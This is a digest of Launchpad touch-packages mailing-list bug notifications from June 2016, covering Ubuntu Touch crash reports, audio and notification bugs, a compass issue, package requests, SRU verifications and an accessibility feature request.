[Touch-packages] [Bug 1589157] [NEW] /usr/lib/arm-linux-gnueabihf/unity-scopes/scoperunner:11:std::string::_M_data:std::string::_M_rep:std::string::size:std::string::compare:std::operator

2016-06-04 Thread errors.ubuntu.com bug bridge
Public bug reported:

The Ubuntu Error Tracker has been receiving reports about a problem
regarding unity-scope-mediascanner.  This problem was most recently seen
with version 0.2+15.04.20160225-0ubuntu1, the problem page at
https://errors.ubuntu.com/problem/a24901410d4410f01d43bc0826bd982a25a6f560
contains more details.

** Affects: unity-scope-mediascanner (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: vivid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to unity-scope-mediascanner
in Ubuntu.
https://bugs.launchpad.net/bugs/1589157

Title:
  /usr/lib/arm-linux-gnueabihf/unity-
  
scopes/scoperunner:11:std::string::_M_data:std::string::_M_rep:std::string::size:std::string::compare:std::operator

Status in unity-scope-mediascanner package in Ubuntu:
  New

Bug description:
  The Ubuntu Error Tracker has been receiving reports about a problem
  regarding unity-scope-mediascanner.  This problem was most recently
  seen with version 0.2+15.04.20160225-0ubuntu1, the problem page at
  https://errors.ubuntu.com/problem/a24901410d4410f01d43bc0826bd982a25a6f560
  contains more details.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/unity-scope-mediascanner/+bug/1589157/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589159] [NEW] /usr/lib/arm-linux-gnueabihf/qt5/bin/qmlscene:6:__gnu_cxx::__verbose_terminate_handler:__cxxabiv1::__terminate:std::terminate:__cxxabiv1::__cxa_throw:core::dbus::B

2016-06-04 Thread errors.ubuntu.com bug bridge
Public bug reported:

The Ubuntu Error Tracker has been receiving reports about a problem
regarding qtdeclarative-opensource-src.  This problem was most recently
seen with version 5.4.1-1ubuntu11~overlay6~1, the problem page at
https://errors.ubuntu.com/problem/3aecd03126b37b17885e6f00f7caea98d710ba46
contains more details.

** Affects: qtdeclarative-opensource-src (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: vivid

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to qtdeclarative-opensource-
src in Ubuntu.
https://bugs.launchpad.net/bugs/1589159

Title:
  /usr/lib/arm-linux-
  
gnueabihf/qt5/bin/qmlscene:6:__gnu_cxx::__verbose_terminate_handler:__cxxabiv1::__terminate:std::terminate:__cxxabiv1::__cxa_throw:core::dbus::Bus::send_with_reply_and_block_for_at_most

Status in qtdeclarative-opensource-src package in Ubuntu:
  New

Bug description:
  The Ubuntu Error Tracker has been receiving reports about a problem
  regarding qtdeclarative-opensource-src.  This problem was most
  recently seen with version 5.4.1-1ubuntu11~overlay6~1, the problem
  page at
  https://errors.ubuntu.com/problem/3aecd03126b37b17885e6f00f7caea98d710ba46
  contains more details.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/qtdeclarative-opensource-src/+bug/1589159/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589160] [NEW] /usr/sbin/NetworkManager:11:set_ap_scan_cb:g_task_return_now:g_task_return:reply_cb:g_task_return_now

2016-06-04 Thread errors.ubuntu.com bug bridge
Public bug reported:

The Ubuntu Error Tracker has been receiving reports about a problem
regarding network-manager.  This problem was most recently seen with
version 1.2.0-0ubuntu0.16.04.2, the problem page at
https://errors.ubuntu.com/problem/cd8f6af8fe544f3904a65dad01091af60d0aca1b
contains more details.

** Affects: network-manager (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: vivid wily xenial

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to network-manager in Ubuntu.
https://bugs.launchpad.net/bugs/1589160

Title:
  
/usr/sbin/NetworkManager:11:set_ap_scan_cb:g_task_return_now:g_task_return:reply_cb:g_task_return_now

Status in network-manager package in Ubuntu:
  New

Bug description:
  The Ubuntu Error Tracker has been receiving reports about a problem
  regarding network-manager.  This problem was most recently seen with
  version 1.2.0-0ubuntu0.16.04.2, the problem page at
  https://errors.ubuntu.com/problem/cd8f6af8fe544f3904a65dad01091af60d0aca1b
  contains more details.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/1589160/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 764414] Re: private master bugs are confusing and lead to more duplicate filings

2016-06-04 Thread JohnWashington
Would 'Confirmed' be a more appropriate status than 'In progress'?

Indeed, given that this bug was reported over 5 years ago, even
mentioning the word 'progress' carries a touch of irony.  :(

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to apport in Ubuntu.
https://bugs.launchpad.net/bugs/764414

Title:
  private master bugs are confusing and lead to more duplicate filings

Status in apport package in Ubuntu:
  In Progress

Bug description:
  Binary package hint: apport

  Apport currently tracks the master bug as a private bug visible only
  to Ubuntu developers (bugcontrol) and makes duplicate bugs public
  after stripping their data.

  This works well but has some downsides:
   - Launchpad cannot show the master bug to folk reporting bugs via apport (so 
they file new bugs always)
   - After users file a new bug apport detects its a duplicate and then they 
cannot see the master bug and get frustrated.

  It would be nice to have:
   - the master bug be public so that reporters of dups can see it in the dupe 
finder and can see if a dupe is detected post-filing.
   - Developers still have easy access to the raw crash data.
    - One way to do that that does not need much development would be to have a 
private bug exist, linked from the master bug (e.g. with a comment or in the 
description; something like 'Confidential crashdump for this bug is attached to 
bug 12345 - only visible to Ubuntu developers').

  One way to achieve this is to have apport file a new public bug to be
  the master. This would have the necessary metadata and would include
  the link to the private bug + gather all the duplicates to itself. One
  downside is that Apport would appear to be the bug reporter for all
  crashdump based bug reports. That's not necessarily a bad thing, but
  it may confuse people.

  Another way would be to have apport file a new private bug, move the
  attachments over from the original bug, add explanation and metadata
  in the description, subscribe bugcontrol and then sanitise the
  original bug report the same way it sanitises public bugs today. This
  would make the original bug be the public master, preserving the date
  of filing and the reporter. OTOH large files would need to be shuffled
  around and this might be unreliable.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/764414/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1544477] Re: No sound notification for new SMS (Ubuntu Touch)

2016-06-04 Thread Anupam
Just noticed something, when this issue appears, taking screenshots also
doesn't produce any sound.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to pulseaudio in Ubuntu.
https://bugs.launchpad.net/bugs/1544477

Title:
  No sound notification for new SMS (Ubuntu Touch)

Status in Canonical System Image:
  Confirmed
Status in media-hub package in Ubuntu:
  Incomplete
Status in pulseaudio package in Ubuntu:
  Confirmed

Bug description:
  I noticed for last 2-3 days there is no sound notification for a new
  SMS, but there's a blinking green LED notification. Also in the
  indicator menu the envelope icon turns green and the new SMS is listed
  as usual. Things are working alright for Telegram, Gmail etc.
  (sound+LED+indicator menu).

  Device: bq Aquaris E5 HD, Ubuntu 15.04 (OTA-9)

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1544477/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1585717] Re: Need sshfs package. Is it planned?

2016-06-04 Thread Launchpad Bug Tracker
Status changed to 'Confirmed' because the bug affects multiple users.

** Changed in: indicator-network (Ubuntu)
   Status: New => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to indicator-network in
Ubuntu.
https://bugs.launchpad.net/bugs/1585717

Title:
  Need sshfs package. Is it planned?

Status in indicator-network package in Ubuntu:
  Confirmed

Bug description:
  I am missing a way to mount my network shares. Got a home server
  running with Ubuntu 14.04 server. My shares are available via sshfs
  with Public Key. Is there a way mounting them already? If not, could
  anyone explain me how to compile or use it myself? Every Ubuntu-device
  I have uses sshfs as my Jolla does too. Need your help! Thanks in
  advance!

  /edit: Sorry, I was writing this from Ubuntu Touch! I thought it would
  be mentioned in any way. So this is ONLY for Ubuntu Touch, normal
  sshfs-package works like a charm!

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/indicator-network/+bug/1585717/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1413818] Re: Notification sounds aren't being played back on E4.5 (ubuntu-push restricts directories and block custom sounds)

2016-06-04 Thread groby
Seems like the Bug is back on OTA-11 - ubuntu-touch-session
0.108+15.04.20160415-0ubuntu1

I don't get no notification sound by telegram anymore.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ubuntu-touch-session in
Ubuntu.
https://bugs.launchpad.net/bugs/1413818

Title:
  Notification sounds aren't being played back on E4.5 (ubuntu-push
  restricts directories and block custom sounds)

Status in Canonical System Image:
  Fix Released
Status in The Savilerow project:
  Invalid
Status in ubuntu-push package in Ubuntu:
  Fix Released
Status in ubuntu-touch-session package in Ubuntu:
  Fix Released
Status in ubuntu-touch-session package in Ubuntu RTM:
  Fix Released

Bug description:
  This affects mostly the push notifications based alerts, SMS et.al.
  work fine.

  With export PULSE_PROP='media.role=alert'

  This has no audible output: paplay 
/usr/share/sounds/ubuntu/notifications/Slick.ogg
  This does:  paplay /usr/share/sounds/ubuntu/ringtones/Soul.ogg

  $ system-image-cli -i
  current build number: 14
  device name: mako
  channel: ubuntu-touch/stable
  alias: ubuntu-touch/ubuntu-rtm/14.09
  last update: 2015-01-16 13:12:29
  version version: 14
  version ubuntu: 20150116
  version device: 20141119
  version custom: mako-1.1

  The hunch is some buffering going on on the android side for short
  sound bytes.

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1413818/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589147] Re: [MS-7817, Realtek ALC887-VD, Green Headphone Out, Front] Playback problem

2016-06-04 Thread Kirill
Haven't sound at front output and have sound only rear side
In mixer stand mute at headphones for default and no save, after changes and 
reboot

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to alsa-driver in Ubuntu.
https://bugs.launchpad.net/bugs/1589147

Title:
  [MS-7817, Realtek ALC887-VD, Green Headphone Out, Front] Playback
  problem

Status in alsa-driver package in Ubuntu:
  New

Bug description:
  Haven't sound at front output and have sound only rear side

  In mixer stand mute at headphones for default and no save, after
  changes and reboot

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: alsa-base 1.0.25+dfsg-0ubuntu5
  ProcVersionSignature: Ubuntu 4.4.0-22.40-generic 4.4.8
  Uname: Linux 4.4.0-22-generic x86_64
  NonfreeKernelModules: nvidia_uvm nvidia
  ApportVersion: 2.20.1-0ubuntu2.1
  Architecture: amd64
  AudioDevicesInUse:
   USERPID ACCESS COMMAND
   /dev/snd/controlC1:  kirill 1684 F pulseaudio
   /dev/snd/controlC0:  kirill 1684 F pulseaudio
  CurrentDesktop: Unity
  Date: Sat Jun  4 23:51:09 2016
  InstallationDate: Installed on 2016-06-04 (0 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 
(20160420.1)
  PackageArchitecture: all
  ProcEnviron:
   LANGUAGE=ru
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=ru_RU.UTF-8
   SHELL=/bin/bash
  SourcePackage: alsa-driver
  Symptom: audio
  Symptom_AlsaPlaybackTest: ALSA playback test through plughw:PCH failed
  Symptom_Card: Встроенное аудио - HDA Intel PCH
  Symptom_Jack: Green Headphone Out, Front
  Symptom_Type: Only some of outputs are working
  Title: [MS-7817, Realtek ALC887-VD, Green Headphone Out, Front] Playback 
problem
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 04/21/2015
  dmi.bios.vendor: American Megatrends Inc.
  dmi.bios.version: V6.7
  dmi.board.asset.tag: To be filled by O.E.M.
  dmi.board.name: H81M-E33 (MS-7817)
  dmi.board.vendor: MSI
  dmi.board.version: 1.0
  dmi.chassis.asset.tag: To be filled by O.E.M.
  dmi.chassis.type: 3
  dmi.chassis.vendor: MSI
  dmi.chassis.version: 1.0
  dmi.modalias: 
dmi:bvnAmericanMegatrendsInc.:bvrV6.7:bd04/21/2015:svnMSI:pnMS-7817:pvr1.0:rvnMSI:rnH81M-E33(MS-7817):rvr1.0:cvnMSI:ct3:cvr1.0:
  dmi.product.name: MS-7817
  dmi.product.version: 1.0
  dmi.sys.vendor: MSI

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/1589147/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589147] [NEW] [MS-7817, Realtek ALC887-VD, Green Headphone Out, Front] Playback problem

2016-06-04 Thread Kirill
Public bug reported:

Haven't sound at front output and have sound only rear side

In mixer stand mute at headphones for default and no save, after changes
and reboot

ProblemType: Bug
DistroRelease: Ubuntu 16.04
Package: alsa-base 1.0.25+dfsg-0ubuntu5
ProcVersionSignature: Ubuntu 4.4.0-22.40-generic 4.4.8
Uname: Linux 4.4.0-22-generic x86_64
NonfreeKernelModules: nvidia_uvm nvidia
ApportVersion: 2.20.1-0ubuntu2.1
Architecture: amd64
AudioDevicesInUse:
 USERPID ACCESS COMMAND
 /dev/snd/controlC1:  kirill 1684 F pulseaudio
 /dev/snd/controlC0:  kirill 1684 F pulseaudio
CurrentDesktop: Unity
Date: Sat Jun  4 23:51:09 2016
InstallationDate: Installed on 2016-06-04 (0 days ago)
InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1)
PackageArchitecture: all
ProcEnviron:
 LANGUAGE=ru
 PATH=(custom, no user)
 XDG_RUNTIME_DIR=
 LANG=ru_RU.UTF-8
 SHELL=/bin/bash
SourcePackage: alsa-driver
Symptom: audio
Symptom_AlsaPlaybackTest: ALSA playback test through plughw:PCH failed
Symptom_Card: Встроенное аудио - HDA Intel PCH
Symptom_Jack: Green Headphone Out, Front
Symptom_Type: Only some of outputs are working
Title: [MS-7817, Realtek ALC887-VD, Green Headphone Out, Front] Playback problem
UpgradeStatus: No upgrade log present (probably fresh install)
dmi.bios.date: 04/21/2015
dmi.bios.vendor: American Megatrends Inc.
dmi.bios.version: V6.7
dmi.board.asset.tag: To be filled by O.E.M.
dmi.board.name: H81M-E33 (MS-7817)
dmi.board.vendor: MSI
dmi.board.version: 1.0
dmi.chassis.asset.tag: To be filled by O.E.M.
dmi.chassis.type: 3
dmi.chassis.vendor: MSI
dmi.chassis.version: 1.0
dmi.modalias: 
dmi:bvnAmericanMegatrendsInc.:bvrV6.7:bd04/21/2015:svnMSI:pnMS-7817:pvr1.0:rvnMSI:rnH81M-E33(MS-7817):rvr1.0:cvnMSI:ct3:cvr1.0:
dmi.product.name: MS-7817
dmi.product.version: 1.0
dmi.sys.vendor: MSI

** Affects: alsa-driver (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: amd64 apport-bug xenial

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to alsa-driver in Ubuntu.
https://bugs.launchpad.net/bugs/1589147

Title:
  [MS-7817, Realtek ALC887-VD, Green Headphone Out, Front] Playback
  problem

Status in alsa-driver package in Ubuntu:
  New

Bug description:
  Haven't sound at front output and have sound only rear side

  In mixer stand mute at headphones for default and no save, after
  changes and reboot

  ProblemType: Bug
  DistroRelease: Ubuntu 16.04
  Package: alsa-base 1.0.25+dfsg-0ubuntu5
  ProcVersionSignature: Ubuntu 4.4.0-22.40-generic 4.4.8
  Uname: Linux 4.4.0-22-generic x86_64
  NonfreeKernelModules: nvidia_uvm nvidia
  ApportVersion: 2.20.1-0ubuntu2.1
  Architecture: amd64
  AudioDevicesInUse:
   USERPID ACCESS COMMAND
   /dev/snd/controlC1:  kirill 1684 F pulseaudio
   /dev/snd/controlC0:  kirill 1684 F pulseaudio
  CurrentDesktop: Unity
  Date: Sat Jun  4 23:51:09 2016
  InstallationDate: Installed on 2016-06-04 (0 days ago)
  InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 
(20160420.1)
  PackageArchitecture: all
  ProcEnviron:
   LANGUAGE=ru
   PATH=(custom, no user)
   XDG_RUNTIME_DIR=
   LANG=ru_RU.UTF-8
   SHELL=/bin/bash
  SourcePackage: alsa-driver
  Symptom: audio
  Symptom_AlsaPlaybackTest: ALSA playback test through plughw:PCH failed
  Symptom_Card: Встроенное аудио - HDA Intel PCH
  Symptom_Jack: Green Headphone Out, Front
  Symptom_Type: Only some of outputs are working
  Title: [MS-7817, Realtek ALC887-VD, Green Headphone Out, Front] Playback 
problem
  UpgradeStatus: No upgrade log present (probably fresh install)
  dmi.bios.date: 04/21/2015
  dmi.bios.vendor: American Megatrends Inc.
  dmi.bios.version: V6.7
  dmi.board.asset.tag: To be filled by O.E.M.
  dmi.board.name: H81M-E33 (MS-7817)
  dmi.board.vendor: MSI
  dmi.board.version: 1.0
  dmi.chassis.asset.tag: To be filled by O.E.M.
  dmi.chassis.type: 3
  dmi.chassis.vendor: MSI
  dmi.chassis.version: 1.0
  dmi.modalias: 
dmi:bvnAmericanMegatrendsInc.:bvrV6.7:bd04/21/2015:svnMSI:pnMS-7817:pvr1.0:rvnMSI:rnH81M-E33(MS-7817):rvr1.0:cvnMSI:ct3:cvr1.0:
  dmi.product.name: MS-7817
  dmi.product.version: 1.0
  dmi.sys.vendor: MSI

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/alsa-driver/+bug/1589147/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1589146] [NEW] ubuntuBSD support

2016-06-04 Thread Jon Boden
Public bug reported:


Hi

Symbols files need some updates in order to build on ubuntuBSD. Please
can you include them?

https://bazaar.launchpad.net/~ubuntubsd/ubuntubsd/patches-
xenial/download/jon%40ubuntubsd.org-20160601072740-fr30k90py99vinto/ilmbase.diff-20160426081048-uj0038tten98r2t3-24/ilmbase.diff

Thank you!

** Affects: ilmbase (Ubuntu)
 Importance: Undecided
 Status: New


** Tags: patch ubuntubsd

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to ilmbase in Ubuntu.
https://bugs.launchpad.net/bugs/1589146

Title:
  ubuntuBSD support

Status in ilmbase package in Ubuntu:
  New

Bug description:
  
  Hi

  Symbols files need some updates in order to build on ubuntuBSD. Please
  can you include them?

  https://bazaar.launchpad.net/~ubuntubsd/ubuntubsd/patches-
  
xenial/download/jon%40ubuntubsd.org-20160601072740-fr30k90py99vinto/ilmbase.diff-20160426081048-uj0038tten98r2t3-24/ilmbase.diff

  Thank you!

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ilmbase/+bug/1589146/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1453218] Re: Not all photos displayed in Events view when importing from content hub

2016-06-04 Thread David Wand
** Changed in: gallery-app (Ubuntu)
 Assignee: Arthur Mello (artmello) => David Wand (flasht)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to gallery-app in Ubuntu.
https://bugs.launchpad.net/bugs/1453218

Title:
  Not all photos displayed in Events view when importing from content
  hub

Status in gallery-app package in Ubuntu:
  Confirmed

Bug description:
  When texting someone on Telegram or messaging-app, I wanted to attach
  a photo from gallery-app, but when content hub switched to gallery-
  app, recently taken pictures (taken via camera-app, or directly
  imported into the pictures folder) were not displaying there.

  I have seen this happening twice, but I couldn't figure out
  deterministic ways to reproduce the problem. Here is what I have done:

  - With gallery-app closed, take some pictures with camera-app, or throw some 
image files in the pictures directory.
  - Open messaging-app/telegram-app or any app that allows you to attach 
pictures
  - Trigger content hub to attach a picture from gallery-app

  Expected behavior:
  - All the new pictures are displayed in the events view

  Actual behavior (when reproducing the problem):
  - Some (if not all) of the new pictures are missing from the Events view.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/gallery-app/+bug/1453218/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1588748] Re: Compass not working on Meizu Pro 5

2016-06-04 Thread Lorn Potter
I know there was a change to add magnetometer. I am not sure of its
landing.

https://code.launchpad.net/~gerboland/qtubuntu-sensors/add-gyro-magnet-sensors/+merge/282033
https://code.launchpad.net/~gerboland/platform-api/add-magnetic-gyro-sensors/+merge/270389

Compass uses a magnetometer and sometimes of sensors to come up with
azimuth.

** Also affects: qtubuntu-sensors (Ubuntu)
   Importance: Undecided
   Status: New

** Also affects: platform-api (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to qtubuntu-sensors in
Ubuntu.
https://bugs.launchpad.net/bugs/1588748

Title:
  Compass not working on Meizu Pro 5

Status in Canonical System Image:
  New
Status in platform-api package in Ubuntu:
  New
Status in qtubuntu-sensors package in Ubuntu:
  New

Bug description:
  On my turbo the compass is not working. This shows in:

  - uNav navigation is always pointing north, even when moving in other 
directions
  - Compass app (https://github.com/andrejcampa/compass) only gives "-1" always

  Not filing under location-service since it probably doesn't deal with
  hardware specific problems.

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1588748/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1588748] Re: Compass not working on Meizu Pro 5

2016-06-04 Thread Lorn Potter
Correction to last comment, compass sometimes uses other sensors (low
level)

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to platform-api in Ubuntu.
https://bugs.launchpad.net/bugs/1588748

Title:
  Compass not working on Meizu Pro 5

Status in Canonical System Image:
  New
Status in platform-api package in Ubuntu:
  New
Status in qtubuntu-sensors package in Ubuntu:
  New

Bug description:
  On my turbo the compass is not working. This shows in:

  - uNav navigation is always pointing north, even when moving in other 
directions
  - Compass app (https://github.com/andrejcampa/compass) only gives "-1" always

  Not filing under location-service since it probably doesn't deal with
  hardware specific problems.

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1588748/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1565932] Re: /sbin/insserv file is missed in Ubuntu 12.04 LTS, 14.04 LTS, 16.04 LTS

2016-06-04 Thread Launchpad Bug Tracker
Status changed to 'Confirmed' because the bug affects multiple users.

** Changed in: insserv (Ubuntu)
   Status: New => Confirmed

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to insserv in Ubuntu.
https://bugs.launchpad.net/bugs/1565932

Title:
  /sbin/insserv file is missed in Ubuntu 12.04 LTS, 14.04 LTS, 16.04 LTS

Status in insserv package in Ubuntu:
  Confirmed

Bug description:
  It seems that Ubuntu 12.04 LTS, 14.04 LTS, 16.04 LTS does not have 
  /sbin/insserv file (see 
http://packages.ubuntu.com/search?suite=xenial&arch=any&mode=filename&searchon=contents&keywords=%2Fsbin%2Finsserv).

  
  But Debian has this file (see 
https://packages.debian.org/search?suite=sid&arch=any&mode=path&searchon=contents&keywords=%2Fsbin%2Finsserv).

  This package is needed by some software (for example NI-VISA 15.5 -
  http://www.ni.com/download/ni-visa-15.5/5848/en/). Please add it to
  Ubuntu 14.04 LTS and 16.04 LTS.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/insserv/+bug/1565932/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1400580] Re: Color Inverse on display. Toggle Negative Image

2016-06-04 Thread mikodo
I have been hesitant to add a comment to this bug. Personally as stated,
I have impaired eye-sight although, I remain fully functional for now
with a few adjustments. I have a brother that is more encumbered who, is
legally blind and, needs many more enhancements to cope with computer
use. He is helped with compositing for Zoom Effect & Magnifier and uses
 on start up as I. I am cognizant of the importance of
fixing this bug for Unity8 users around the globe. Not all people are
going to know of the alternatives available to them within Linux. So, I
am impeaching for the resolution of this within Unity8 for, many more
users than we two brothers. The availability of Unity users especially,
casual users needing these features, (red-shift, high-contrast, and
possibly including, the zooming and magnifying effects also) within
Unity8 as gui is, much needed for these people who, have much less
ability to find solutions because of their sight limitations and casual
computing use.

I believe work on Unity8 is being done now, to bring it to functionality
as the Ubuntu X server replacement. I think now, should also be the time
to build in these important gui features.

Thank you.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to mir in Ubuntu.
https://bugs.launchpad.net/bugs/1400580

Title:
   Color Inverse on display. Toggle Negative Image

Status in Mir:
  Fix Released
Status in mir package in Ubuntu:
  Fix Released
Status in unity8 package in Ubuntu:
  Triaged

Bug description:
  I would like to see a feature that allowed Unity8, to easily inverse
  the desktop colors.  To be able to easily turn on and off a negative
  (inverse) display of the desktop. For now, it can be done with X
  (xcalib). It would be nice to see Unity8 do this natively, instead of
  Ubuntu users needing this feature hoping, X-11 support will always be
  available.

  This is a feature I use, due to impaired eye-sight.

To manage notifications about this bug go to:
https://bugs.launchpad.net/mir/+bug/1400580/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1532899] Re: Group chat sometimes misses messages with Unknown Number Message not found

2016-06-04 Thread Jason
I'm seeing this frequently.

I'm using the Aquarius E5, and am on AT&T's 2G network in the USA (if
that matters).

I'm happy to pull in logs from my phone if that would be helpful, though
it seems that the bugs reproducible enough that logs are easy to get.
Let me know.

If there's anything I can do to help investigate this or get it fixed,
please let me know, as it's making it very hard to use messaging on
Ubuntu Phone.

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to messaging-app in Ubuntu.
https://bugs.launchpad.net/bugs/1532899

Title:
  Group chat sometimes misses messages with Unknown Number Message not
  found

Status in Canonical System Image:
  Confirmed
Status in messaging-app package in Ubuntu:
  Invalid
Status in nuntium package in Ubuntu:
  Confirmed
Status in ubuntu-download-manager package in Ubuntu:
  Confirmed

Bug description:
  This happened the last two times I received group chat messages.
  Several messages were not listed in the chat but rather under an
  Unknown Number contact with content Message no found.

  I see 4 such entries for the time covered in the log files.

To manage notifications about this bug go to:
https://bugs.launchpad.net/canonical-devices-system-image/+bug/1532899/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1581480] Re: [SRU] New stable release 2.48.2

2016-06-04 Thread Bartosz Kosiorek
It is working perfectly for me after install glib-networking from
proposed.

** Tags removed: verification-needed
** Tags added: verification-done

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to glib-networking in Ubuntu.
https://bugs.launchpad.net/bugs/1581480

Title:
  [SRU] New stable release 2.48.2

Status in glib-networking package in Ubuntu:
  Fix Released
Status in glib-networking source package in Xenial:
  Fix Committed

Bug description:
  [ Description ]

  Upstream have released a new bugfix release.

  [ Changes ]

  From NEWS:

* gnutls: Fixed an infinite loop if a server sent two identical
  copies of its CA certificate [#765317, Carlos Garcia Campos]

  
  [ QA, testing, regression potential ]

  Under the GNOME MRE, you can believe all bugs upstream says are fixed
  are really fixed. Just test the system and make sure there are no
  regressions (e.g. look at errors.ubuntu.com).

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/glib-networking/+bug/1581480/+subscriptions

-- 
Mailing list: https://launchpad.net/~touch-packages
Post to : touch-packages@lists.launchpad.net
Unsubscribe : https://launchpad.net/~touch-packages
More help   : https://help.launchpad.net/ListHelp


[Touch-packages] [Bug 1581439] Re: [SRU] New stable release 2.48.1

2016-06-04 Thread Bartosz Kosiorek
It is working perfectly for me after install glib2.0 from proposed.
I tested it for several days.

** Tags removed: verification-needed
** Tags added: verification-done

-- 
You received this bug notification because you are a member of Ubuntu
Touch seeded packages, which is subscribed to glib2.0 in Ubuntu.
